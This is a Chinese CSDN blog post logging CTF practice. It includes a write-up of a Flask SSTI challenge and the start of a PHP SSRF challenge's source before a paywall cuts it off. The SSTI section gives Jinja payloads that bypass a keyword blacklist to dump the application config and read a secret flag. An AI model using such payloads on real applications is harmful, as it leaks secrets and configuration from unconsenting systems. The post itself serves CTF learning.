一周刷题记录 | Web&Misc

最新推荐文章于 2023-02-27 11:17:38 发布
最新推荐文章于 2023-02-27 11:17:38 发布
阅读量955 收藏 2
点赞数 2
分类专栏: CTF训练计划 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43431158/article/details/109736186
版权
这篇博客记录了作者在一周内刷题的经历,涉及Web安全领域的SSTI、SSRF等漏洞。通过分析CTF比赛中的题目,解释了如何利用这些漏洞,包括SSTI利用flask的内置函数、SSRF配合cURL和parse_url进行内外网信息获取,以及如何进行主从复制RCE。还提到了其他题目,如Bash命令执行和VeraCrypt硬盘加密的解密过程。
摘要由CSDN通过智能技术生成

文章目录

BUU

每天一道题,冲冲冲!

0x00:[WesternCTF2018]shrine

首页便给了一段flask代码,简单分析一下

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')

@app.route('/')
def index():
    return open(__file__).read()
    
@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{
   {% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

发现这一段代码

app.config['FLAG'] = os.environ.pop('FLAG')
#pop() 函数用于移除列表中的一个元素(默认最后一个元素),并且返回该元素的值。

在这里插入图片描述
意思便是该题将FLAG存储到了配置变量中,但下面的代码过滤了config以及()

这个题考察的是SSTI,那下面就要想办法去使用config查看所有应用程序的配置值(FLAG值应该包含在其中),需要构造一个和config作用相同的payload,可以使用flask两个内置函数进行构造

  1. url_for() – 用于反向解析,生成url
  2. get_flashed_messages() – 用于获取flash消息

先寻找一下全部全局变量

{
   {
   url_for.__globals__}}
{
   {
   get_flashed_messages.__globals__}}

在这里插入图片描述
发现有current_app全局变量,查看一下config

{
   {
   url_for.__globals__['current_app'].config}}
{
   {
   get_flashed_messages.__globals__['current_app'].config}}
{
   {
   url_for.__globals__['current_app'].config['FLAG']}}

在这里插入图片描述

0x01:[网鼎杯 2020 玄武组]SSRFMe

<?php
function check_inner_ip($url)
{
   
    $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);
    if (!$match_result)
    {
   
        die('url fomat error');
    }
    try
    {
   
        $url_parse=parse_url($url);
    }
    catch(Exception $e)
    {
   
        die('url fomat error');
        return false;
    }
    $hostname=$url_parse['host'];
    $ip=gethostbyname($hostname);
    $int_ip=ip2long($ip);
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
}

function safe_request_url($url)
{
   

    if (check_inner_ip($url))
    {
   
        echo $url
最低0.47元/天 解锁文章
lemonl1
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
赛题类型 Web、Crypto、Pwn、Reverse、Misc 各是指什么意思?
Sumarua的博客
07-26 1万+
赛题类型 Web、Crypto、Pwn、Reverse、Misc 各是指什么意思? 一般我们在参加一些”网络安全技能大赛“的时候,都会出现“Web、Crypto、Pwn、Reverse 、Misc”这五种赛题类型,往往很多新手都不清楚各是什么意思?代表了哪些方向? 今天就简单的给大家说说,具体如下: Web(渗透测试) 一般是指web网站渗透、漏洞利用。 例如:命令注入、 SQL注入、代码审计、 Restful API、Owasp10、BurpSuite。 Crypto(密码学) 主要是针对一些密码学,例如
9th Geek SSRF
柠檬木有枝
12-08 2478
前言 学校举办的第九届极客大挑战,其中一道根据 Blackhat 议题出的 ssrf 题目,也是第一次尝试阅读 php 源码,望大牛们勿喷 代码分析 &lt;?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); if (!$m...
buuctf13(perl脚本GET open命令漏洞&redis主从复制&xss&ssti关键字过滤绕过&csrf)
weixin_63231007的博客
02-27 1135
[HITCON 2017]SSRFme & [网鼎杯 2020 玄武组]SSRFMe & [GWCTF 2019]mypassword & [GWCTF 2019]你的名字& [GKCTF 2021]CheckBot
08_SSRF服务器请求伪造
qq_45301512的博客
12-10 240
(2) 在linux 操作系统下 file_get_contents 限制了协议的开始 可以采用传递一个不存在的协议联合相对路径来进行任意文件包含。(2) parse_url(),此时的@127.0.0.1 被当作了用户账号,80被当初密码,主机为。(1) 当传一个本地的文件的路径时候,bihuo.txt里面内容 ‘flag:bihuo.txt’(1) 服务器为kali,通过kali的存在ssrf漏洞的文件访问主机里面的某个文件内容。(3) gethostbyname() 函数获取的主机为。
[网鼎杯 2020 玄武组]SSRFMe
fmyyy1的博客
05-27 432
第一次做redis相关的题目。 主要考点是redis主从复制rce <?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fomat error'); } try { $url_pars
Python库 | scikit-misc-0.1.1.tar.gz
03-10
`scikit-misc`是一个这样的库,专为Python开发人员设计,旨在提供一些在其他标准库中可能缺失的实用工具和算法。这个资源的版本是0.1.1,它以`.tar.gz`压缩格式提供,这是一种常见的打包和压缩方式,用于Linux和Unix...
System Administrator Power Tools & Misc.-开源
05-04
系统管理Power Tools and Miscellany(SAPTAM)是可扩展的系统管理和开发工具的集合,可最大程度地发挥进取的管理员的操作空间。
CTF资料web题型及其理论+misc日志分析
03-25
CTF资料web题型及其理论+misc日志分析
Allegro 环境变量值设置说明-全网最全-logic&manufacture&misc&obsolet
03-11
Allegro 环境变量值设置; 控制逻辑导入、导出和编辑的设置;
sun.misc.BASE64Encoder源码及jar包
07-26
在Java编程语言中,`sun.misc.BASE64Encoder`和`BASE64Decoder`是用于进行Base64编码和解码的内部类,它们属于`sun.misc`包,这是一个非公开(非标准)的Java库。`sun.misc`包中的类主要用于JVM内部使用,因此在官方...
SSRF-服务端请求伪造
weixin_42739903的博客
01-06 307
SSRF漏洞介绍和一些例题
攻防世界 新手练习区 MISC+WEB
七月_的博客
06-21 2069
题目描述:菜猫给了菜狗一张图,说图下面什么都没有
ip2long的用法
weixin_30493321的博客
11-17 373
ip2long:将IPv4的ip地址(以小数点分隔形式)转换为int Description int ip2long ( string ip_address ) 如果ip地址非法,返回FALSE(PHP 5.0.0以后) 注意,由于返回值是int,所以会造成数据溢出,比如有些ip地址转换后变成负数,因此需要转换成unsigned int类型 unsigned int _ip2l...
BUUCTF [第二章 web进阶]SSRF Training1
sinat_41572027的博客
06-25 544
BUUCTF [第二章 web进阶]SSRF Training1 1.尝试输入正确URL,能正常跳转2.查看网页源码,发现challenge.php网页3.进入challenge.php,学习源码 4.构造payload 绕过parse_url() 5.成功绕过后,访问flag.php 获得flag 便捷方法:在url栏输入http://127.0.0.1/flag.php 即可成功访问...
详解ip2long和long2ip回答为什么PHP中的ip2long转化为负数
夏乐宾的博客
07-25 1540
 原文地址: http://3shanmen.com/index.php/index/article/articledetail/article_id/3   在PHP中,我们会经常遇到使用客户端的IP地址的操作,而如果需要大量的存取IP地址的时候,直接将IP地址以字符串存储到数据库中将占用不小的存储空间,而将IP地址以long整型进行存储将节约不少空间。         如何将IP地址转换...
如何在Python开发中拒绝SSRF漏洞
hacckjacking
10-13 435
0x01 SSRF漏洞常见防御及绕过方法 SSRF是一种常见的Web漏洞,于需要请求外部内容的逻辑存在中,比如本地化网络图片、XML解析时的外部实体注入、软件的离线下载等。 URL,提供代码直接请求这个URL,将造成SSRF漏洞 具体表现在以下几个财团上: URL为内网IP或域名,攻击者可以通过SSRF漏洞扫描目标内网,并寻找内网内的漏洞,想办法快速瞄准 URL 中包含端口,攻击者可以扫描并发现内网中的其他服务,再进一步进行利用 当请求方法允许其他协议的时候,将可能使用gophar、file等协议
buu-day04
anwen12的博客
01-02 393
0x01[HarekazeCTF2019]Easy Notes 这个题目给了源码,用户又没有后端校验,所以我们很容易想到考session的反序列化,因为(sctf考烂了)。具体分析流程可以看网上的·wp,总结就是,需要伪造以下两点: 文件名 序列化的数据 0x02 [SWPU2019]Web3 访问任意路由发现的token:keyqqqwwweee!@#$%^&*,发现是伪造session。下面就是随便操作了。 .eJyrVspMUbKqVlJIUrJS8g1xLFeq1VHKLI7PyU_Pz
PHP函数ip2long()返回值为负数的解决办法
liuzp111的专栏
03-28 2666
PHP的ip2long 是将IP地址转换为数值的函数。 ip2long() 转出来的数值应该都是正整数,但是在某些机器转出负数, 刚开始以为是 PHP 版本问题, 后来做些测试, 确定是系统版本 32bits 和 64bits 的问题。 32 bits ip2long(): -2147483648 ~ 214748364764 64 bits ip2long(): 0 ~ 429496729
webmisc那个就业
最新发布
09-19
另一方面,在Misc领域,虽然概括性较广,但却存在许多与Web相关的就业机会。比如数据分析、人工智能和机器学习等领域,这些都需要大量的数据处理、算法优化以及模型设计能力。同时,网络安全、信息管理和数字化营销...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值